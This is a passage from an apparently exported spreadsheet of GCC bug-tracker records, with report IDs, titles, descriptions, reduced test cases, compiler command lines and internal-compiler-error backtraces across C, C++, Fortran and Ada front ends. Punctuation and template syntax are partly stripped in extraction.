Executing on host: /home/hp/combined/mmixware-sim/gcc/xgcc
-B/home/hp/combined/mmixware-sim/gcc/   -O2  -w -fno-show-column -c  -\
isystem /home/hp/combined/mmixware-sim/mmix-knuth-mmixware/./newlib/targ-include
-isystem /home/hp/combined/combined/newlib/libc/\
include  -o 20030703-1.o
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/compile/20030703-1.c   
(timeout = 300)
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/compile/20030703-1.c: In
function 'MBMotionEstimation':^M
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/compile/20030703-1.c:9:
error: MMIX Internal: What is the CC of this?^M
(ne:DI (reg:SI 0 $0 [orig:269 D.1164 ] [269])^M
    (const_int 0 [0x0]))^M
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/compile/20030703-1.c:9:
internal compiler error: in mmix_output_condition\
 at config/mmix/mmix.c:2661^M
Last known to work on: Thu Jun  2 00:27:52 UTC 2005.</t>
  </si>
  <si>
    <t>GCC-33965</t>
  </si>
  <si>
    <t>internal compiler error: tree check: expected class 'type' have 'constant' (integer_cst) in cp_type_quals at cp/typeck.c:6955 (vararg templates)</t>
  </si>
  <si>
    <t>In the following SFINAE scenario involving vararg templates an non-type template parameters the compiler ICEs instead of ignoring the specialization.
Latest SVN g++ with patches from Doug Gregor for vararg templates.
template
struct foo
{
    static bool const value = false
}
template class T typename... Args&gt;
struct foo &gt;
{
    static bool const value = false
}
template
struct int_
{}
int main()
{
    foo &gt; f // ICE
}</t>
  </si>
  <si>
    <t>GCC-19098</t>
  </si>
  <si>
    <t>tree-ssa-dom.c has an if statement whose condition is probably wrong</t>
  </si>
  <si>
    <t>tree-ssa-dom.c has the following
      if (!e-&gt;flags &amp; EDGE_DFS_BACK)
which is always 0 because !e-&gt;flags is always 0 or 1 and
EDGE_DFS_BACK is 32.</t>
  </si>
  <si>
    <t>GCC-5469</t>
  </si>
  <si>
    <t>[IA64] ia64 arc profiling can use the wrong global pointer</t>
  </si>
  <si>
    <t>Arc profiling on ia64 inserts profiling code between a call
and the restore of the global pointer but the profiling
code uses the global pointer to address the arc count.  If
the call was to a function in a shared library then it uses
the wrong global pointer.  If the user is lucky this will
cause the profiled program to abort otherwise it might
increment data used by the shared library.
This bug causes the failure of gcc.misc-tests/gcov-7.c for
ia64.  That test uses setjump and longjmp but the test case
provided here uses C library functions rand and srand and is
much simpler.
Janis Johnson wrote:
&gt; Would you please try out the test case provided with PR target/5469
&gt; (http://gcc.gnu.org/ml/gcc-bugs/2002-01/msg00957.html) to see if it
&gt; fails on hppa64-hp-hpux11.00?  I expect that it will because your test
&gt; results show test gcc.misc-tests/gcov-7.c failing for that target and
&gt; on ia64-linux they fail because of the same problem.
You are correct:
0x40000000000026a0 :   std  dp8(sr0r3)
0x40000000000026a4 :   ldi cr26
0x40000000000026a8 :   ldo -10(sp)ret1
0x40000000000026ac :   bl 0x400000000000259c %r2
0x40000000000026b0 :   nop
0x40000000000026b4 :   addil 0dp%r1
0x40000000000026b8 :   ldd 100(r1)r1
0x40000000000026bc :   copy r1r20
0x40000000000026c0 :   ldd 18(r20)r19
It seg faults at 0x40000000000026c0.  dp was not restored after the call to srand (set_fp_status+132).  It runs ok without -fprofile-arcs.
Release:
gcc version 3.1 20020122 (experimental)
Environment:
ia64-unknown-linux-gnu
hppa64-hp-hpux11.00
How-To-Repeat:
Compile the test case on ia64-linux with -fprofile-arcs
and execute it.  Examine generated assembly code to see
that the restore of the GP after calls to libc functions
is done after the GP is used to reference the profile
counts.</t>
  </si>
  <si>
    <t>GCC-54570</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.dg/builtin-object-size-8.c execution test</t>
  </si>
  <si>
    <t>I broke it by making early FRE more reliably figure out address equivalences.
extern void abort (void)
union A
{
  int a1
  char a2[3]
}
int main()
{
  union A *a = __builtin_malloc (212)
  if (__builtin_object_size (&amp;a-&gt;a1 1) != 4
      || __builtin_object_size (&amp;a-&gt;a2 1) != 212)
    abort ()
  return 0
}
Would break in similar ways with struct { int a[] } a and &amp;a vs. &amp;a.a.</t>
  </si>
  <si>
    <t>GCC-8049</t>
  </si>
  <si>
    <t>SSE unaligned vector stores crash with -O0</t>
  </si>
  <si>
    <t>I have encountered several cases at optimization level zero (-O0) wherein the app seg faults on a movaps instruction just prior to calling _mm_store_ps().
gcc -O0 -msse -g main.c
main.c:
-------
#include 
#include 
void MatrixMultiply( float A[16] float B[16] float C[16] )
int main( void )
{
    float 	A[16] __attribute__ ((aligned (16) ) )
    float	B[16] __attribute__ ((aligned (16) ) )
    float	C[16] __attribute__ ((aligned (16) ) )
    int i    
    for( i = 0 i &lt; 16 i++ )
    {
        A[i] = (double) (rand() - RAND_MAX/2) / (double) (RAND_MAX )
        B[i] = (double) (rand() - RAND_MAX/2) / (double) (RAND_MAX )
        C[i] = 0.0
    }
    MatrixMultiply( A B C )  //the crasher
    return 0
}
void MatrixMultiply( float A[16] float B[16] float C[16] )
{
    __m128 A1 = _mm_load_ps( A )
    __m128 A2 = _mm_load_ps( A + 4 )
    __m128 A3 = _mm_load_ps( A + 8 )
    __m128 A4 = _mm_load_ps( A + 12 )
    __m128 B1 = _mm_load_ps( B )
    __m128 B2 = _mm_load_ps( B + 4 )
    __m128 B3 = _mm_load_ps( B + 8 )
    __m128 B4 = _mm_load_ps( B + 12 )
    __m128 C1 = _mm_mul_ps( _mm_shuffle_ps( A1 A1 _MM_SHUFFLE(0000) ) B1 )
    __m128 C2 = _mm_mul_ps( _mm_shuffle_ps( A2 A2 _MM_SHUFFLE(0000) ) B2 )
    __m128 C3 = _mm_mul_ps( _mm_shuffle_ps( A3 A3 _MM_SHUFFLE(0000) ) B3 )
    __m128 C4 = _mm_mul_ps( _mm_shuffle_ps( A4 A4 _MM_SHUFFLE(0000) ) B4 )
    __m128 D1 = _mm_mul_ps( _mm_shuffle_ps( A1 A1 _MM_SHUFFLE(1111) ) B1 )
    __m128 D2 = _mm_mul_ps( _mm_shuffle_ps( A2 A2 _MM_SHUFFLE(1111) ) B2 )
    __m128 D3 = _mm_mul_ps( _mm_shuffle_ps( A3 A3 _MM_SHUFFLE(1111) ) B3 )
    __m128 D4 = _mm_mul_ps( _mm_shuffle_ps( A4 A4 _MM_SHUFFLE(1111) ) B4 )
    C1 = _mm_add_ps( C1 D1 )
    C2 = _mm_add_ps( C2 D2 )
    C3 = _mm_add_ps( C3 D3 )
    C4 = _mm_add_ps( C4 D4 )
    D1 = _mm_mul_ps( _mm_shuffle_ps( A1 A1 _MM_SHUFFLE(2222) ) B1 )
    D2 = _mm_mul_ps( _mm_shuffle_ps( A2 A2 _MM_SHUFFLE(2222) ) B2 )
    D3 = _mm_mul_ps( _mm_shuffle_ps( A3 A3 _MM_SHUFFLE(2222) ) B3 )
    D4 = _mm_mul_ps( _mm_shuffle_ps( A4 A4 _MM_SHUFFLE(2222) ) B4 )
    C1 = _mm_add_ps( C1 D1 )
    C2 = _mm_add_ps( C2 D2 )
    C3 = _mm_add_ps( C3 D3 )
    C4 = _mm_add_ps( C4 D4 )
    D1 = _mm_mul_ps( _mm_shuffle_ps( A1 A1 _MM_SHUFFLE(3333) ) B1 )
    D2 = _mm_mul_ps( _mm_shuffle_ps( A2 A2 _MM_SHUFFLE(3333) ) B2 )
    D3 = _mm_mul_ps( _mm_shuffle_ps( A3 A3 _MM_SHUFFLE(3333) ) B3 )
    D4 = _mm_mul_ps( _mm_shuffle_ps( A4 A4 _MM_SHUFFLE(3333) ) B4 )
    C1 = _mm_add_ps( C1 D1 )
    C2 = _mm_add_ps( C2 D2 )
    C3 = _mm_add_ps( C3 D3 )
    C4 = _mm_add_ps( C4 D4 )
    _mm_store_ps( C +  0 C1 )	//Crashes here on movaps that reads C1 into xmm0 prior to call _mm_store_ps if -O0
    _mm_store_ps( C +  4 C2 )
    _mm_store_ps( C +  8 C3 )
    _mm_store_ps( C + 12 C4 )
}
Release:
gcc 3.3 20020925 (experimental)
Environment:
Red Hat Linux 7.3 (P4/2530)</t>
  </si>
  <si>
    <t>GCC-3745</t>
  </si>
  <si>
    <t>bug in basic_string.tcc</t>
  </si>
  <si>
    <t>On line 630 of the basic_string.tcc file:
  __pos = std::min(__size - __n __pos)
should be:
 __pos = min(__size - __n __pos)
since the entire block is in the namespace std { scope.
This can lead to a compilation error. Furthermore all other calls
to the min template are made without the namespace std:: 
identifier.
Release:
unknown
Environment:
Linux SuSE 7.2</t>
  </si>
  <si>
    <t>alm</t>
  </si>
  <si>
    <t>GCC-21956</t>
  </si>
  <si>
    <t>[4.1 Regression] useless symbols in object files</t>
  </si>
  <si>
    <t>Compile with -freorder-blocks-and-partition and you'll find
00000000006b4a73 t .COLDE999
00000000004026a0 t .HOTB0
These symbols are not removed by the assembler because they are not
named properly.  The partitioning code should be using either
ASM_GENERATE_INTERNAL_LABEL or targetm.asm_out.internal_label or
both.</t>
  </si>
  <si>
    <t>GCC-16704</t>
  </si>
  <si>
    <t>Letter F not understood as a radix-16 digit in READ statement.</t>
  </si>
  <si>
    <t>Letters A-E are understood as base-16 digits but not F or f.
program main
  character*2 buf
  buf = 'ff'
  read (buf '(Z2.2)') i
  if (i.ne.255) call abort
end
% a.out
Fortran runtime error: Bad value during integer read
FIX FOLLOWS:
[lei@roadrunner io]% cvs diff -cp read.c
Index: read.c
===================================================================
RCS file: /cvsroot/gcc/gcc/libgfortran/io/read.cv
retrieving revision 1.2
diff -c -p -r1.2 read.c
*** read.c      13 May 2004 06:41:02 -0000      1.2
--- read.c      25 Jul 2004 10:47:13 -0000
*************** read_radix (fnode * f char *dest int l
*** 526531 ****
--- 526532 ----
            case 'c':
            case 'd':
            case 'e':
+             case 'f':
              c = c - 'a' + '9' + 1
              break
*************** read_radix (fnode * f char *dest int l
*** 534539 ****
--- 535541 ----
            case 'C':
            case 'D':
            case 'E':
+             case 'F':
              c = c - 'A' + '9' + 1
              break</t>
  </si>
  <si>
    <t>GCC-66461</t>
  </si>
  <si>
    <t>[4.9/5/6/7 Regression] ICE on missing end program in fixed source</t>
  </si>
  <si>
    <t>A missing end program in a fixed source s.f :
      program p
         integer x(2)
         x = 0
         if ( x(1) &lt; 0 .or.
     &amp;        x(2) &lt; 0 ) print * x
      !end
yields :
f951: internal compiler error: free_expr0(): Bad expr type
---
Whereas a missing end program in a free source s.f90 :
      program p
         integer x(2)
         x = 0
         if ( x(1) &lt; 0 .or. &amp;
              x(2) &lt; 0 ) print * x
      !end
yields :
f951: Error: Unexpected end of file in 's.f90'</t>
  </si>
  <si>
    <t>GCC-8954</t>
  </si>
  <si>
    <t>[3.4 Regression] Bootstrap failure on irix6.5 - CPP half-integer narrower than CPP character</t>
  </si>
  <si>
    <t>stage1 bootstrap fails with 
/exd6/billingd/obj/gcc-3.4-bib/gcc/xgcc -B/exd6/billingd/obj/gcc-3.4-bib/gcc/ -B/exd6/billingd/tmp/gcc-3.4-bib/mips-sgi-irix6.5/bin/ -B/exd6/billingd/tmp/gcc-3.4-bib/mips-sgi-irix6.5/lib/ -isystem /exd6/billingd/tmp/gcc-3.4-bib/mips-sgi-irix6.5/include -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/exd2/billingd/src/gcc-3.4-bib/gcc -I/exd2/billingd/src/gcc-3.4-bib/gcc/. -I/exd2/billingd/src/gcc-3.4-bib/gcc/config -I/exd2/billingd/src/gcc-3.4-bib/gcc/../include  -DL_muldi3 -c /exd2/billingd/src/gcc-3.4-bib/gcc/libgcc2.c -o libgcc/./_muldi3.o
cc1: internal error: CPP half-integer narrower than CPP character
Release:
3.4-bi 20021213 (experimental)
Environment:
mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>GCC-79998</t>
  </si>
  <si>
    <t>typo in diagnostic specified bound %wu</t>
  </si>
  <si>
    <t>from gimple-ssa-sprintf.c:
warning_at (gimple_location (info.callstmt) info.warnopt ()
            specified bound %wu exceeds %
            dstsize)
There is an extra space after INT_MAX.</t>
  </si>
  <si>
    <t>GCC-81465</t>
  </si>
  <si>
    <t>[8 Regression] ICE in estimate_edge_growth at gcc/ipa-inline.h:85 on s390x target</t>
  </si>
  <si>
    <t>With a cross compiler:
$ ./xg++ -B. /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/abi/nvptx-nrv1.C -fno-early-inlining -Os
during IPA pass: inline
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/abi/nvptx-nrv1.C:68:1: internal compiler error: in estimate_edge_growth at ipa-inline.h:86
 }
 ^
0xee24ee estimate_edge_growth
	../../gcc/ipa-inline.h:85
0xee2f2f estimate_size_after_inlining(cgraph_node* cgraph_edge*)
	../../gcc/ipa-inline-analysis.c:300
0x19bc15b caller_growth_limits
	../../gcc/ipa-inline.c:186
0x19bc94e can_inline_edge_p
	../../gcc/ipa-inline.c:383
0x19bfc81 update_caller_keys
	../../gcc/ipa-inline.c:1344
0x19c1cb2 inline_small_functions
	../../gcc/ipa-inline.c:2047
0x19c3168 ipa_inline
	../../gcc/ipa-inline.c:2438
0x19c3e44 execute
	../../gcc/ipa-inline.c:2847</t>
  </si>
  <si>
    <t>GCC-7179</t>
  </si>
  <si>
    <t>No error on DIMENSION A(250 000 250 000) on 32-bit target.</t>
  </si>
  <si>
    <t>The following should draw an error message from the
Fortran frontend on 32-bit targets as the array
cannot possibly be addressed using 32-bit addresses.
      dimension  a(250000250000)
      a(11)= 0.
      write(**) ' a'a(11)
      end
Release:
GCC-3.1
Environment:
All.</t>
  </si>
  <si>
    <t>salcedo</t>
  </si>
  <si>
    <t>GCC-83726</t>
  </si>
  <si>
    <t>[8 Regression] ICE: in final_scan_insn at final.c:3063</t>
  </si>
  <si>
    <t>seen with r256272 on aarch64-linux-gnu building hyphy. worked around with -O2
$ cat HYDialogDefs.ii
typedef struct { long a b bottom c } d
class e {
public:
  e(d bool)
}
long f
void g() {
  d h = {}
  h.c = 70
  for ( f)
    new e(h 0)
  h.bottom = 0
}
$ g++ -std=gnu++98 -O3 -c HYDialogDefs.ii
HYDialogDefs.ii: In function 'void g()':
HYDialogDefs.ii:13:1: error: could not split insn
 }
 ^
(insn:TI 20 18 95 (set (reg:TI 1 x1 [101])
        (const_wide_int 0x460000000000000000)) HYDialogDefs.ii:11 50 {*movti_aarch64}
     (nil))
during RTL pass: final
HYDialogDefs.ii:13:1: internal compiler error: in final_scan_insn at final.c:3063
0x5607bb _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:108
0x8413bf final_scan_insn(rtx_insn* _IO_FILE* int int int*)
        ../../src/gcc/final.c:3063
0x84175f final(rtx_insn* _IO_FILE* int)
        ../../src/gcc/final.c:2065
0x841c6f rest_of_handle_final
        ../../src/gcc/final.c:4551
0x841c6f execute
        ../../src/gcc/final.c:4625
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-54947</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] [C++11] lambda cannot capture-by-copy inside braced-init-list</t>
  </si>
  <si>
    <t>struct X
{
  template
    X(L)
    { }
}
template
  void
  test()
  {
    int i = 0
    A a_ok_1( [=] { return i } )  // OK
    A a_ok_2( [i] { return i } )  // OK
    A a_err_1{ [i] { return i } }  // error
    A a_err_2{ [=] { return i } }  // error
  }
int main()
{
  test()
}
lam.cc:17:17: error: the value of â€˜iâ€™ is not usable in a constant expression
     A a_err_1{ [i] { return i } }  // error
                 ^
lam.cc:12:9: note: â€˜int iâ€™ is not const
     int i = 0
         ^
lam.cc:18:17: error: expression â€˜ = â€™ is not a constant-expression
     A a_err_2{ [=] { return i } }  // error
                 ^
There's no error when using direct-initialization only list-initialization.
No error if test() is not a function template.
Works fine with 4.6 and clang++</t>
  </si>
  <si>
    <t>GCC-4634</t>
  </si>
  <si>
    <t>[m68k] Internal compiler error when compiling gcc-3.0</t>
  </si>
  <si>
    <t xml:space="preserve">	I tried to compile a cross-compiler (gcc-3.0) for m68k. I am using the precompiled gcc-3.0 from debian/woody gcc-3.0 -v outputs:
Configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin
--enable-objc-gc i386-linux.
Thread model: posix
gcc version 3.0.2 20010922 (Debian prerelease)
I unpacked the sourcecode configured it with --target=m68k-mac-linux und typed make CC=gcc-3.0 CXX=g++-3.0. After some time an internal compiler error is claimed:
The command ./xgcc -B./ -B/usr/local/m68k-mac-linux/bin/ -isystem /usr/local/m68k-mac-linux/include
-DCROSS_COMPILE -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I. -I../../gcc-3.0/gcc -I../../gcc-3.0/gcc/. -I../../gcc-3.0/gcc/config -I../../gcc-3.0/gcc/../include  -g0 \
  -finhibit-size-directive -fno-inline-functions \
  -fno-exceptions  -Dinhibit_libc \
  -c ../../gcc-3.0/gcc/crtstuff.c -DCRT_BEGIN -o crtbegin.o
fails with the '-v' and '-save-temps' options the following output is created:
Reading specs from ./specs
Configured with: ../gcc-3.0/configure --target=m68k-mac-linux
Thread model: single
gcc version 3.0
 ./cpp0 -lang-c -v -I. -I. -I../../gcc-3.0/gcc -I../../gcc-3.0/gcc/. -I../../gcc-3.0/gcc/config -I../../gcc-3.0/gcc/../include -iprefix ./../lib/gcc-lib/m68k-mac-linux/3.0/ -isystem ./include -isystem /usr/local/m68k-mac-linux/bin/include -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dmc68000 -Dmc68020 -Dlinux -D__ELF__ -D__unix__ -D__mc68000__ -D__mc68020__ -D__linux__ -D__unix -D__mc68000 -D__mc68020 -D__linux -Asystem=unix -Asystem=posix -Acpu=m68k -Amachine=m68k -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -D__HAVE_68881__ -DCROSS_COMPILE -DIN_GCC -Dinhibit_libc -DCRT_BEGIN -isystem /usr/local/m68k-mac-linux/include -isystem ./include ../../gcc-3.0/gcc/crtstuff.c crtstuff.i
ignoring nonexistent directory /usr/local/m68k-mac-linux/bin/include
GNU CPP version 3.0 (cpplib) (68k GNU/Linux with ELF)
ignoring nonexistent directory ../lib/gcc-lib/m68k-mac-linux/3.0/include
ignoring nonexistent directory ../lib/gcc-lib/m68k-mac-linux/3.0/../../../../m68k-mac-linux/sys-include
ignoring nonexistent directory ../lib/gcc-lib/m68k-mac-linux/3.0/../../../../m68k-mac-linux/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/m68k-mac-linux/3.0/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/m68k-mac-linux/3.0/../../../../m68k-mac-linux/sys-include
ignoring nonexistent directory /usr/local/lib/gcc-lib/m68k-mac-linux/3.0/../../../../m68k-mac-linux/include
ignoring duplicate directory .
ignoring duplicate directory ../../gcc-3.0/gcc
ignoring duplicate directory include
#include ... search starts here:
#include  search starts here:
 .
 ../../gcc-3.0/gcc
 ../../gcc-3.0/gcc/config
 ../../gcc-3.0/include
 include
 /usr/local/m68k-mac-linux/include
End of search list.
 ./cc1 -fpreprocessed crtstuff.i -quiet -dumpbase crtstuff.c -g0 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -version -finhibit-size-directive -fno-inline-functions -fno-exceptions -o crtstuff.s
GNU CPP version 3.0 (cpplib) (68k GNU/Linux with ELF)
GNU C version 3.0 (m68k-mac-linux)
        compiled by GNU C version 3.0.2 20010922 (Debian prerelease).
../../gcc-3.0/gcc/crtstuff.c: In function `__do_global_dtors_aux':
../../gcc-3.0/gcc/crtstuff.c:225: Internal compiler error in expected_value_to_br_prob
at predict.c:303
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0
Environment:
System: Linux saturn 2.4.10 #1 Fri Oct 12 20:27:14 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: m68k-mac-linux
configured with: ../gcc-3.0/configure --target=m68k-mac-linux
How-To-Repeat:
	The .i - file is locate at http://adele.gerwinski.de/~benedikt/crtstuff.i.bz2.
Unformatted:
 sEND-PR: ice-on-illegal-code GCC gives an ICE instead of reporting an error</t>
  </si>
  <si>
    <t>benedikt</t>
  </si>
  <si>
    <t>GCC-27877</t>
  </si>
  <si>
    <t>path mentioned in faq for specs file is incorrect</t>
  </si>
  <si>
    <t>The FAQ on gcc.gnu.org states in section 2.2 Dynamic linker is unable to find GCC libraries the following:
However if you feel you really need such an option to be passed automatically to the linker you may add it to the GCC specs file. This file can be found in the same directory that contains cc1 (run gcc -print-prog-name=cc1 to find it). You may add linker flags such as -R or -rpath depending on platform and linker to the *link or *lib specs.
Seems that the correct location of the specs file is found by running
gcc --print-file libgcc.a instead.
Unless I misunderstood something I think this paragraph in the FAQ needs to be corrected.
Thanks
*gjt*</t>
  </si>
  <si>
    <t>theurich</t>
  </si>
  <si>
    <t>GCC-50763</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: verify_gimple failed: missing PHI def with -ftree-tail-merge</t>
  </si>
  <si>
    <t>Created attachment 25527
reduced testcase
Compiler output:
$ gcc -O2 -fno-tree-ccp -fno-tree-copy-prop -fno-tree-vrp testcase.c
testcase.c: In function 'f':
testcase.c:6:5: warning: incompatible implicit declaration of built-in function 'exp' [enabled by default]
testcase.c:3:6: error: missing PHI def
.MEM_9 = PHI 
testcase.c:3:6: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Might be related to -ftree-tail-merge as it doesn't crash with -fno-tree-tail-merge.
Tested revisions:
r180072 - crash
r179959 - crash
r178498 - OK
4.6 r177922 - OK</t>
  </si>
  <si>
    <t>GCC-27506</t>
  </si>
  <si>
    <t>[4.2 Regression] bitfield enum handling regression</t>
  </si>
  <si>
    <t>the following testcase no longer compiles: 
=== Cut ===
enum EBorderStyle
{
  BNATIVE BHIDDEN
}
class BorderValue
{
public:
  EBorderStyle style:1
}
struct CollapsedBorderValue
{
  EBorderStyle style () const
  {
    return border ? border-&gt;style : BNATIVE
  }
  const BorderValue *border
}
=== Cut ===</t>
  </si>
  <si>
    <t>GCC-51063</t>
  </si>
  <si>
    <t>gcc does not pass the -Fpathname option unmodified to /usr/bin/ld linker (all Darwin systems)</t>
  </si>
  <si>
    <t>The framework pathname option -Fpathname on the MacOS X (Darwin) platform (any version) is not properly passed to the /usr/bin/ld linker by the gcc command. It seems that one or more whitespaces are added between the -F and the pathname on the generated ld command. I verified this behaviour of gcc the the following MacOS X platforms: MacOS X 10.4.11 on a PPC Computer MacOS X 10.5.8 on a PPC Computer and MacOS X 10.6.8 on a Intel Computer.</t>
  </si>
  <si>
    <t>lutzwei</t>
  </si>
  <si>
    <t>GCC-69024</t>
  </si>
  <si>
    <t>[cilkpus] cilk_spawn is broken for initializations with implicit conversion operators defined</t>
  </si>
  <si>
    <t>The following code should compile but gives this error:
implicit_cast.cpp: In function â€˜void g()â€™:
implicit_cast.cpp:12:28: error: invalid use of â€˜_Cilk_spawnâ€™
   double x = _Cilk_spawn f()
/////////////////////////////////////////////////////////////////
struct A {
  operator double() {
    return 33.0
  }
}
A f() {
  return {}
}
void g() {
  double x = _Cilk_spawn f()
}
int main() {
  g()
  return 0
}
/////////////////////////////////////////////////////////////////</t>
  </si>
  <si>
    <t>GCC-51194</t>
  </si>
  <si>
    <t>[C++0x] ICE about template aliasing</t>
  </si>
  <si>
    <t>compiler option: -Wall -std=c++0x
error message:
242:43: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in lookup_template_class_1 at cp/pt.c:7293
code:
/*
  including boost/mpl/and.hpp
             boost/type_traits/is_same.hpp
 */
template 
enable_if_c
{
  typedef T type
}
template 
enable_if_c
{ }
template 
using enable_if = enable_if_c
template  class... Conds &gt;
struct condition_and
{
  template 
  using enable = enable_if...&gt;&gt;
}
template 
using Test = typename condition_and
&lt; 
// For any two parameters meta-functions same error occurs.
  boost::is_same
 boost::is_same
 boost::is_same
&gt;::template enable // here</t>
  </si>
  <si>
    <t>fate66260</t>
  </si>
  <si>
    <t>GCC-77763</t>
  </si>
  <si>
    <t>ICE in parse_struct_map at fortran/parse.c:3064</t>
  </si>
  <si>
    <t>Doing some tests now with lately introduced DEC extensions.
Needs option -fdec affects version 6 and 7 :
$ cat z1.f90
block data
   structure /s1/
   end structure
end block data
$ gfortran-7-20160925 -fdec -c z1.f90
z1.f90:2:17:
    structure /s1/
                 1
Error: STRUCTURE statement is not allowed inside of BLOCK DATA at (1)
f951: internal compiler error: Segmentation fault
0xc28c9f crash_signal
        ../../gcc/toplev.c:337
0x6d9bff parse_struct_map
        ../../gcc/fortran/parse.c:3064
0x6da781 parse_spec
        ../../gcc/fortran/parse.c:3688
0x6de3e0 parse_block_data
        ../../gcc/fortran/parse.c:5679
0x6de3e0 gfc_parse_file()
        ../../gcc/fortran/parse.c:6049
0x720d82 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198
---
Replacing structure with type :
$ cat y1.f90
block data
   type s1
   end type
end block data
$ gfortran-7-20160925 -c y1.f90
$</t>
  </si>
  <si>
    <t>GCC-82126</t>
  </si>
  <si>
    <t>[8 regression] gnat.dg/alignment3.adb FAILs</t>
  </si>
  <si>
    <t>Between 20170905 (r251718) and 20170906 (r251809) the gnat.dg/alignment3.adb
test began to FAIL
FAIL: gnat.dg/alignment3.adb (test for excess errors)
Excess errors:
alignment3.adb:30:49: warning: source alignment (1) &lt; alignment of Natural (4)
I'm seeing it on both 32 and 64-bit SPARC according to gcc-testresults the test
also FAILs on IA-64.
  Rainer</t>
  </si>
  <si>
    <t>GCC-34754</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid function arguments in variadic template</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
================================================================
template class... T&gt; struct A
{
  void foo(T)
  void bar(T)
}
================================================================
bug.cc:3: error: parameter packs not expanded with `...':
bug.cc:3: note:         'template &gt; class T'
bug.cc:4: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in bind_template_template_parm at cp/tree.c:1242
Please submit a full bug report [etc.]
The ICE appeared between 2007-10-13 and 2007-11-13.</t>
  </si>
  <si>
    <t>GCC-35970</t>
  </si>
  <si>
    <t>[4.4 Regression] except.c:3382: error: 'struct eh_status' has no member named 'call</t>
  </si>
  <si>
    <t>gcc -c  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-
prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribut
e -pedantic -Wno-long-long -Wno-variadic-macros                                 
     -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc/gc
c -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include
 -I/opt/gnu/gcc/gcc-4.4.0/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/g
cc/../libdecnumber/dpd -I../libdecnumber  ../../gcc/gcc/expmed.c -o expmed.o
gcc -c  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-
prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribut
e -pedantic -Wno-long-long -Wno-variadic-macros                                 
     -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc/gc
c -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include
 -I/opt/gnu/gcc/gcc-4.4.0/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/g
cc/../libdecnumber/dpd -I../libdecnumber  ../../gcc/gcc/expr.c -o expr.o
../../gcc/gcc/except.c: In function 'dw2_size_of_call_site_table':
../../gcc/gcc/except.c:3382: error: 'struct eh_status' has no member named 'call
_site_data_used'
../../gcc/gcc/except.c:3388: error: 'struct eh_status' has no member named 'call
_site_data'
../../gcc/gcc/except.c: In function 'sjlj_size_of_call_site_table':
../../gcc/gcc/except.c:3398: error: 'struct eh_status' has no member named 'call
_site_data_used'
../../gcc/gcc/except.c:3404: error: 'struct eh_status' has no member named 'call
_site_data'
make[3]: *** [except.o] Error 1</t>
  </si>
  <si>
    <t>GCC-68510</t>
  </si>
  <si>
    <t>[concepts] ICE: in gimplify_var_or_parm_decl at gimplify.c:1827</t>
  </si>
  <si>
    <t>Created attachment 36817
Reduced testcase
Using g++-trunk (GCC) 6.0.0 20151124 (experimental). The testcase was mechanically reduced. An older snapshot used to be able to compile the original unreduced program according to the reflog:
commit c66cf0b787e892170f4981e8473aab601610a630
git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@229691 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-24127</t>
  </si>
  <si>
    <t>ICE in libjava.compile/PR6865.java reported as PASS in testsuite.</t>
  </si>
  <si>
    <t>Make -k check in libjava shows an ICE on this test case However this is
reported as a PASS.
To reproduce: Run make -k check in libjava.</t>
  </si>
  <si>
    <t>GCC-27613</t>
  </si>
  <si>
    <t>compile fails with Unclassifiable statement error message</t>
  </si>
  <si>
    <t>The following code fails to compile with the error message:
 In file test.f90:14
    stuff = stuff+stuff(n+1)
   1
Error: Unclassifiable statement at (1)
The program test.f90:
program test
  integer :: stuff
  write(* *) called stuff  stuff(1)  times
